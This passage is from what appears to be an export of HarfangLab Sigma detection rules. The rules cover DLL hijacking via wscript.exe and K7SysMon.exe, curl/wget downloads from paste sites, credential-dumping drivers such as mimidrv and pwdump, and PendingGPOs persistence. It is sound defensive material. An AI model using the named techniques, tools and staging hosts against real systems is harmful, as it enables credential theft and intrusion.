"https://twitter.com/an0n_r0/status/1544472352657915904", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_wscript.yml", + "content": "title: DLL Hijacking via wscript.exe\nid: 33eb8e8a-ac3d-4882-a33c-a06936e7ac1c\ndescription: |\n Detects potential Windows DLL Hijacking via wscript.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wscript.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + 
"quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "33eb8e8a-ac3d-4882-a33c-a06936e7ac1c", + "rule_name": "DLL Hijacking via wscript.exe", + "rule_description": "Detects potential Windows DLL Hijacking via wscript.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-09-15", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "33f20b55-a6a9-47fa-8058-df707fd25325", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.095386Z", + "creation_date": "2026-03-23T11:45:34.095388Z", + "enabled": 
true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.095392Z", + "rule_level": "high", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1105/", + "https://attack.mitre.org/techniques/T1071/001/" + ], + "name": "t1105_curl_suspicious_link_macos.yml", + "content": "title: File Downloaded via cURL or wget from Suspicious URL (macOS)\nid: 33f20b55-a6a9-47fa-8058-df707fd25325\ndescription: |\n Detects the usage of cURL or wget to download a file from public hosting services that may contain a malicious payload.\n This technique is used by attackers to download payloads that are hosted on public websites.\n It is recommended to perform an analysis of the downloaded file to check if the content is malicious.\nreferences:\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2023/02/13\nmodified: 2025/09/10\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.t1071.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Wget\n - classification.macOS.LOLBin.Curl\n - classification.macOS.Behavior.FileDownload\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image|endswith:\n - '/wget'\n - '/curl'\n CommandLine|contains:\n - 'cdn.discordapp.com'\n - 'api.telegram.org'\n - 'www.dropbox.com'\n - 'api.dropboxapi.com'\n - 'content.dropboxapi.com'\n - 'transfer.sh'\n - 'anonfiles.com'\n - 'file.io'\n - 'gofile.io'\n - 'raw.githubusercontent.com'\n - 'gist.githubusercontent.com'\n - 'pastebin.com'\n - 'mediafire.com'\n - 'mega.nz'\n - 'ddns.net'\n - '.paste.ee'\n - '.hastebin.com'\n - '.ghostbin.co/'\n - 'ufile.io'\n - 'storage.googleapis.com'\n - 'send.exploit.in'\n - 'privatlab.net'\n - 'privatlab.com'\n - 'sendspace.com'\n - 'pastetext.net'\n - 'pastebin.pl'\n - 'paste.ee'\n - 'pastie.org'\n - 'archive.org'\n - 
'paste.c-net.org'\n\n exclusion_timesketch:\n CommandLine|contains: ' https://raw.githubusercontent.com/google/'\n\n exclusion_homebrew:\n CommandLine|contains: ' https://raw.githubusercontent.com/Homebrew/'\n\n exclusion_ohmyzsh:\n CommandLine|contains: ' https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh'\n\n exclusion_ruby_brew_update:\n ParentCommandLine|startswith: '/opt/homebrew/library/homebrew/vendor/portable-ruby/current/bin/ruby -w1 --disable=gems,rubyopt /opt/homebrew/library/homebrew/brew.rb upgrade'\n\n exclusion_nvm:\n CommandLine: 'curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v*/install.sh'\n\n exclusion_nix:\n CommandLine|contains: ' https://raw.githubusercontent.com/nixos/experimental-nix-installer/'\n\n exclusion_vscode:\n CommandLine|contains:\n - ' https://raw.githubusercontent.com/microsoft/vscode/master/extensions/json-language-features/package.json'\n - ' https://raw.githubusercontent.com/microsoft/pyright/*/packages/vscode-pyright/package.json'\n - ' https://raw.githubusercontent.com/microsoft/vscode/main/extensions/typescript-language-features/package.json'\n - ' https://raw.githubusercontent.com/rust-analyzer/rust-analyzer/*/editors/code/package.json'\n - ' https://raw.githubusercontent.com/luals/vscode-lua/master/package.json'\n\n exclusion_apache:\n CommandLine|contains: ' https://raw.githubusercontent.com/apache/'\n\n exclusion_installomator:\n CommandLine: 'curl -o installomator.sh https://raw.githubusercontent.com/installomator/installomator/main/installomator.sh'\n\n exclusion_minikube:\n CommandLine|contains: 'curl -LO https://storage.googleapis.com/minikube/releases/latest/'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "33f20b55-a6a9-47fa-8058-df707fd25325", + "rule_name": "File Downloaded via cURL or wget from Suspicious URL (macOS)", + 
"rule_description": "Detects the usage of cURL or wget to download a file from public hosting services that may contain a malicious payload.\nThis technique is used by attackers to download payloads that are hosted on public websites.\nIt is recommended to perform an analysis of the downloaded file to check if the content is malicious.\n", + "rule_creation_date": "2023-02-13", + "rule_modified_date": "2025-09-10", + "rule_os": "macos", + "rule_status": null, + "rule_tactic_tags": [ + "attack.command_and_control" + ], + "rule_technique_tags": [ + "attack.t1071.001", + "attack.t1105" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "340aa5a9-5616-4c66-a76c-91098df5a7b3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "critical", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.086442Z", + "creation_date": "2026-03-23T11:45:34.086444Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.086449Z", + "rule_level": "critical", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "http://foofus.net/goons/fizzgig/fgdump/", + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PWDumpX.htm", + 
"https://github.com/gentilkiwi/mimikatz", + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/gsecdump.htm", + "http://foofus.net/goons/fizzgig/pwdump/", + "https://attack.mitre.org/software/S0119/", + "https://attack.mitre.org/techniques/T1068/", + "https://attack.mitre.org/techniques/T1003/" + ], + "name": "t1003_malicious_driver_for_credential_dumping.yml", + "content": "title: Malicious Driver Linked to Credential Dumping Loaded\nid: 340aa5a9-5616-4c66-a76c-91098df5a7b3\ndescription: |\n Detects the loading of malicious Windows kernel drivers that have the ability to perform credential dumping.\n Attackers may try to dump secrets or credentials from the system directly from the kernel to use for later lateral movement or persistence.\n These drivers are either signed (usually maliciously) or unsigned, if integrity checks were disabled earlier in the injection chain.\n It is recommended to analyze the context around the loading of the malicious driver to look for other malicious actions on the host.\nreferences:\n - http://foofus.net/goons/fizzgig/fgdump/\n - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PWDumpX.htm\n - https://github.com/gentilkiwi/mimikatz\n - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/gsecdump.htm\n - http://foofus.net/goons/fizzgig/pwdump/\n - https://attack.mitre.org/software/S0119/\n - https://attack.mitre.org/techniques/T1068/\n - https://attack.mitre.org/techniques/T1003/\ndate: 2022/08/02\nmodified: 2025/01/09\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - attack.credential_access\n - attack.t1003\n - classification.Windows.Source.DriverLoad\n - classification.Windows.Rootkit.CredentialDumper\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: driver_load\ndetection:\n selection:\n ImageLoaded|contains:\n - 'fgexec'\n - 'dumpsvc'\n - 'cachedump'\n - 'mimidrv'\n - 'gsecdump'\n - 'servpw'\n - 'pwdump'\n\n condition: 
selection\nlevel: critical\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "340aa5a9-5616-4c66-a76c-91098df5a7b3", + "rule_name": "Malicious Driver Linked to Credential Dumping Loaded", + "rule_description": "Detects the loading of malicious Windows kernel drivers that have the ability to perform credential dumping.\nAttackers may try to dump secrets or credentials from the system directly from the kernel to use for later lateral movement or persistence.\nThese drivers are either signed (usually maliciously) or unsigned, if integrity checks were disabled earlier in the injection chain.\nIt is recommended to analyze the context around the loading of the malicious driver to look for other malicious actions on the host.\n", + "rule_creation_date": "2022-08-02", + "rule_modified_date": "2025-01-09", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.credential_access", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1003", + "attack.t1068" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "34295504-9358-4119-aa08-84b4c5880ad5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.097205Z", + "creation_date": "2026-03-23T11:45:34.097207Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.097211Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html", + "https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-i/107742/", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_k7sysmon.yml", + "content": "title: DLL Hijacking via K7SysMon.exe\nid: 34295504-9358-4119-aa08-84b4c5880ad5\ndescription: |\n Detects potential Windows DLL Hijacking via K7SysMon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\n - https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-i/107742/\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/09/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n 
selection:\n ProcessOriginalFileName: 'K7SysMon.EXE'\n ImageLoaded|endswith: '\\K7SysMn1.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\K7 Computing\\'\n - '?:\\Program Files (x86)\\K7 Computing\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\K7 Computing\\'\n - '?:\\Program Files (x86)\\K7 Computing\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'K7 Computing Pvt Ltd'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "34295504-9358-4119-aa08-84b4c5880ad5", + "rule_name": "DLL Hijacking via K7SysMon.exe", + "rule_description": "Detects potential Windows DLL Hijacking via K7SysMon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2023-09-05", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "3437577c-61e0-46ac-9f02-bbc91228e25f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", 
+ "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.072669Z", + "creation_date": "2026-03-23T11:45:34.072671Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.072675Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1484/001/", + "https://securelist.com/gootkit-the-cautious-trojan/102731/" + ], + "name": "t1484_001_persistence_registry_pendinggpos.yml", + "content": "title: Pending GPOs Added\nid: 3437577c-61e0-46ac-9f02-bbc91228e25f\ndescription: |\n Detects when an entry in pending GPOs is added to the registry. This has been used by malwares such as GootKit.\n To achieve persistence, the malware generates an INF file containing a [DefaultInstall] section that references the payload.\n It then modifies the PendingGPOs registry key, inserting the absolute path of the INF file.\n When explorer.exe processes Group Policy Objects (GPOs), it executes the payload specified in the [DefaultInstall] section of the INF file.\n It is recommended to ensure that this modification is legitimate and performed by an authorized administrator. 
You need to review the [DefaultInstall] section of the INF file to check if it includes an absolute path to malware.\nreferences:\n - https://attack.mitre.org/techniques/T1484/001/\n - https://securelist.com/gootkit-the-cautious-trojan/102731/\ndate: 2020/09/24\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1484.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n # PendingGPOs trick used by gootkit for instance\n # contains X values :\n # Count (set to 1)\n # SectionX (Section1/Section2/...) : DefaultInstall for instance (in .ini file)\n # PathX (Path1/Path2/...) : path to ini file\n\n # only alert on PathX being set (others are meaningless)\n TargetObject|contains: '\\SOFTWARE\\Microsoft\\IEAK\\GroupPolicy\\PendingGPOs\\Path'\n\n filter_empty:\n Details: '(Empty)'\n\n exclusion_ie_custom_settings:\n # commandline : rundll32 iedkcs32.dll,BrandExternal ;*2,3